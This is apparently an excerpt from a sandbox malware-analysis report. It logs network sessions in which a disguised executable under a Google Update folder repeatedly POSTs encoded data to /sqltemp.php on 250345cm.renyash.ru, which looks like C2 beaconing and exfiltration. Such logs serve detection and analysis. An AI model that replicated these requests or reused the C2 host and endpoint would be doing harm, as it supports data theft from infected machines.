                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iqssxt3s%2BUx2uWr9bV6ALUAoMtSIptaANKMYaMvvygSXz6RsszSJihbKPJTfzkJYC6rXl8srrpweeH0BjJvs%2BUOFVYQcSfRQZqhLEpA8P8knqZSeAH3b3a%2BwizwvwQ%2BJnHGg5Zg%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364476edd0c78-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2268&min_rtt=1645&rtt_var=1864&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=220045&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.6 | 62589 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:40.975280046 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:41.328991890 CET | 1124 | OUT | Data Raw: 53 54 5f 50 51 5c 54 50 58 56 52 59 56 5b 59 50 5b 5d 54 5d 55 5e 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: ST_PQ\TPXVRYV[YP[]T]U^PYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$/7<.%>'A;- -$^?9#S). ?Z+;&,#U,*&Y.,Y-)
Jan 1, 2025 16:02:41.429148912 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:41.596493959 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:41 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6LFymUaa%2BZDv%2FFvq8cYCutN4CUOWFJDgu0cFS3zYpv3s4ucLD26OLJyDVga6bmUTQ0CPy35hR7croIJa7JCueo0RXPnMtlqhUJbnBvo3Fl4T0Gn1YbrDzRRosHhAiENssNyW0lI8"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3644cad8042d0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4207&min_rtt=1733&rtt_var=5599&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=67809&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.6 | 62595 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:41.723901987 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:42.078960896 CET | 1124 | OUT | Data Raw: 56 50 5a 51 51 5b 51 51 58 56 52 59 56 51 59 52 5b 5a 54 5e 55 5a 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VPZQQ[QQXVRYVQYR[ZT^UZPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y&/X7<&'X8,)>#[$X+*#>;7T0<;>&?.:&Y.,Y-
Jan 1, 2025 16:02:42.169867039 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:42.434268951 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:42 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OOhsD2jAaorM8kDEXnOUhnIEWqEEKoXrjbFqikENBRn1s1oOUyYfDqfijuTFQcg9JK9oxM4irlEvlNqgpVIhdzE25nfcEzW4ZoOw1YBeGBTf6os%2FjUsnoCZGiqUZMHBjY4nEQatS"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3645149961865-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1514&rtt_var=769&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=629581&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.6 | 62601 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:42.575678110 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:42.923135996 CET | 1124 | OUT | Data Raw: 53 50 5a 53 54 5e 51 55 58 56 52 59 56 58 59 5e 5b 59 54 51 55 5f 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SPZST^QUXVRYVXY^[YTQU_P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._'&7!Y'.'A82!.,X?$(>+ "<%#S.*&Y.,Y-%
Jan 1, 2025 16:02:43.022933960 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:43.192013979 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eCIMRvirtoRT0rPXF90OoytEvUqe7SyF1QH9SNg3qHy9O8cf4q5OvpOYyIH7oFb%2Bz6Wcfmh03vx%2BBOWMGtZoP%2BCaz4vI2FdNkUxc43htb2QFNxukalnne%2BrQjwNT2E4%2BvjL5kVni"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364569f5b7ce8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8321&min_rtt=2005&rtt_var=13384&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=27790&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.6 | 62607 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:43.326776028 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:43.672934055 CET | 1124 | OUT | Data Raw: 53 55 5a 57 54 5d 51 55 58 56 52 59 56 5b 59 56 5b 5b 54 5e 55 5c 50 55 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SUZWT]QUXVRYV[YV[[T^U\PUZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$."/%'-(;14=3(;V=.!2 ?5B14-&Y.,Y-)
Jan 1, 2025 16:02:43.790270090 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:44.058361053 CET | 801 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zMA7eegZzF4u6wmb%2FQiPOB2ShYcISg3ByMF1qsbFcFBH1mf1SKC7q%2BlCXg0vprObMtGrBve9UeZvqJfkgeXaImNlVJ1SOckzHEoPrGJqxR2BCQ1nPFbyvjgU7JQf27T2aZd6gSef"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3645b6d4243b1-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4630&min_rtt=2187&rtt_var=5707&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=67172&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
40  192.168.2.6  62613  104.21.38.84  80  7048  C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp  Bytes transferred  Direction  Data
Jan 1, 2025 16:02:44.192681074 CET  302  OUT  POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:44.547753096 CET  1124  OUT  Data Raw: 53 50 5f 5c 54 5e 54 52 58 56 52 59 56 58 59 50 5b 59 54 5b 55 54 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SP_\T^TRXVRYVXYP[YT[UTP[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$/] 20'E.* #+(>>8X7(?9%?4::&Y.,Y-%
Jan 1, 2025 16:02:44.646042109 CET  25  IN  HTTP/1.1 100 Continue
Jan 1, 2025 16:02:44.903242111 CET  811  IN  HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sj2w7iZEcQ5WWg8j0LxsYyoNZsV%2Fj%2FTNMWXpYHSS%2BCXxyaxMfDmB3Zc%2FxF6g5UpvkEEzkDBNLk7j4g5bcnVweD9iE9pIrKXNzJHdY1TSFKp6%2FFjYxQSx8lEt%2F61ItAZ2DlXSyFyi"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36460b98b7d00-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8550&min_rtt=1977&rtt_var=13888&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=26758&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
41  192.168.2.6  62619  104.21.38.84  80  7048  C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp  Bytes transferred  Direction  Data
Jan 1, 2025 16:02:44.964205980 CET  302  OUT  POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:45.324645996 CET  1964  OUT  Data Raw: 53 55 5f 56 51 58 54 50 58 56 52 59 56 5a 59 56 5b 5c 54 5f 55 54 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SU_VQXTPXVRYVZYV[\T_UTP]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.'<)Z"/)_37A;*& [/?)+W*4]#"\((51,?-&Y.,Y--
Jan 1, 2025 16:02:45.427402020 CET  25  IN  HTTP/1.1 100 Continue
Jan 1, 2025 16:02:45.699793100 CET  960  IN  HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZPOxsR9%2FF9yiPQ8u1ZX4ToKzdpTqlJdwvr0F%2FuI9pp5qOjYrzeAx3D318vIl9N6C4yfuf6khHACSxOc%2FachYyGirWoNhjSzYOmu7fuz%2F1%2B0YVF5o4hT5rv7AZn%2BXaADZPJ20Atf0"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364659cecc3f5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2713&min_rtt=1539&rtt_var=2926&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=133528&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 55 3d 3d 2e 1c 26 54 33 04 3c 3d 06 0b 26 3d 35 01 3c 3b 26 15 27 3e 38 03 3d 29 24 02 21 2c 21 58 26 5e 3b 07 20 03 37 5b 27 34 2b 59 05 1c 20 42 36 2f 02 1c 3d 2d 09 5d 32 3f 03 5d 33 2e 38 5d 28 38 34 57 22 2b 01 1d 30 13 38 1e 3e 04 06 1f 27 3c 33 5b 39 3f 29 54 30 3a 2c 54 00 11 25 0f 24 0f 3b 06 20 24 24 12 35 31 3d 10 32 27 36 56 26 2f 3c 0b 37 3a 39 00 31 31 3f 13 22 20 3d 00 31 15 25 11 21 3e 23 18 29 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%U==.&T3<=&=5<;&'>8=)$!,!X&^; 7['4+Y B6/=-]2?]3.8](84W"+08>'<3[9?)T0:,T%$; $$51=2'6V&/<7:911?" =1%!>#)%S -H?WS0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
42  192.168.2.6  62620  104.21.38.84  80  7048  C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp  Bytes transferred  Direction  Data
Jan 1, 2025 16:02:45.036222935 CET  302  OUT  POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:45.391571045 CET  1124  OUT  Data Raw: 53 55 5f 5d 54 5c 54 55 58 56 52 59 56 50 59 50 5b 5d 54 51 55 5f 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SU_]T\TUXVRYVPYP[]TQU_P_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.3?% :'.(,=T4>3<90=>+!2<(861/#U.&Y.,Y-
Jan 1, 2025 16:02:45.490514994 CET  25  IN  HTTP/1.1 100 Continue
Jan 1, 2025 16:02:45.778443098 CET  808  IN  HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bue5ZeOFwMIieGE17Ebw0lUMq0u%2BpC75yOQp9GKCKi1OcAh6Tmp9bTIQW%2FzwVO3V27MUOHWfSgNuvWyLWDm5ECDHdSS10DD%2Bf9MEaYvDxunNKoM8DcEyz0MmCfA5iVgLM1tR5M%2Bi"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364660cd242b3-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4502&min_rtt=1879&rtt_var=5951&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=63855&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
43  192.168.2.6  62626  104.21.38.84  80  7048  C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp  Bytes transferred  Direction  Data
Jan 1, 2025 16:02:45.913611889 CET  278  OUT  POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
Jan 1, 2025 16:02:46.266894102 CET  1124  OUT  Data Raw: 53 55 5f 51 54 51 51 52 58 56 52 59 56 5e 59 55 5b 52 54 50 55 5a 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SU_QTQQRXVRYV^YU[RTPUZP[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y&,=]"?!^%>;>7<7)- Z4! (+=C&,$::&Y.,Y-
Jan 1, 2025 16:02:46.357459068 CET  25  IN  HTTP/1.1 100 Continue
Jan 1, 2025 16:02:46.621115923 CET  801  IN  HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:46 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jnbsrAdTorrck3nUDo6IEVckf4OQnTnCA03prLBks4YQMNcceIiRH8uS%2FjWC70jKLTFwuLEjLDV6RMSGKB6nRF47pwkcUGtqky1hw1CC01wT0mesORzFXbZFp7gxrxz85lnbQoSr"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3646b7c73efa5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=1885&rtt_var=1001&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=476656&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
44  192.168.2.6  62632  104.21.38.84  80  7048  C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp  Bytes transferred  Direction  Data
Jan 1, 2025 16:02:46.755052090 CET  302  OUT  POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:47.110240936 CET  1124  OUT  Data Raw: 53 55 5a 50 51 5f 54 51 58 56 52 59 56 50 59 56 5b 58 54 5f 55 5d 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SUZPQ_TQXVRYVPYV[XT_U]PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$/6 ?X%-?D,*S!.<Y?$*. "4(*&/;S-*&Y.,Y-
Jan 1, 2025 16:02:47.228429079 CET  25  IN  HTTP/1.1 100 Continue
Jan 1, 2025 16:02:47.493441105 CET  808  IN  HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:47 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
